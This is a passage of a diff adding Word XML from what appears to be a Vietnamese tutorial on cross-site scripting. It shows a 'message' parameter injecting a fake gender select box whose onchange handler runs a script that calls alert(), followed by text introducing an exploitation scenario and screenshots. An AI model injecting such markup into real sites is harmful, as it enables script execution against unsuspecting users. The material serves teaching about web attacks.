+                <w:color w:val="0000FF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>message</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>=&lt;label&gt;Gender&lt;/label&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="0000FF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>select</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> class = </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="A31515"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>"form-control"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> onchange=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="A31515"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>"java_script_:show()"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="0000FF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>option</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="0000FF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>value</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="A31515"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>"Male"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>&gt;Male&lt;/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="0000FF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>option</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="0000FF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>option</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="0000FF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>value</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="A31515"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>"Female"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>&gt;Female&lt;/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="0000FF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>option</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>&lt;/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="0000FF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>select</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="0000FF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>function</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:lang w:eastAsia="ja-JP"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> show(){alert();}&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Khi đấy form đăng ký sẽ trở thành như thế này:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2225"/>
+        </w:tabs>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ja-JP"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="293E1B7E" wp14:editId="4EB17482">
+            <wp:extent cx="4548505" cy="1911985"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
+            <wp:docPr id="20" name="Picture 20" descr="https://images.viblo.asia/full/4bdaaffe-6e9f-4a3d-a980-309dfe6f2d44.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 22" descr="https://images.viblo.asia/full/4bdaaffe-6e9f-4a3d-a980-309dfe6f2d44.png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId28">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4548505" cy="1911985"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Người dùng sẽ chẳng chút nghi ngờ với một form “bình thường” như thế này, và khi lựa chọn giới tính, Script sẽ được thực thi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ja-JP"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A87A06C" wp14:editId="6DCF5919">
+            <wp:extent cx="5220335" cy="1399288"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="24" name="Picture 24" descr="https://images.viblo.asia/full/eca2b478-9da6-43f7-a48a-c98387898400.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 29" descr="https://images.viblo.asia/full/eca2b478-9da6-43f7-a48a-c98387898400.png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5220335" cy="1399288"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Kịch bản khai thác:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ja-JP"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A4E829C" wp14:editId="7DDC6A6A">
+            <wp:extent cx="5220335" cy="2973563"/>
+            <wp:effectExtent l="19050" t="19050" r="18415" b="17780"/>
+            <wp:docPr id="25" name="Picture 25" descr="https://images.viblo.asia/full/cc00ebb0-67cc-4110-91e4-4188104777fd.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 31" descr="https://images.viblo.asia/full/cc00ebb0-67cc-4110-91e4-4188104777fd.png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5220335" cy="2973563"/>
+                    </a:xfrm>
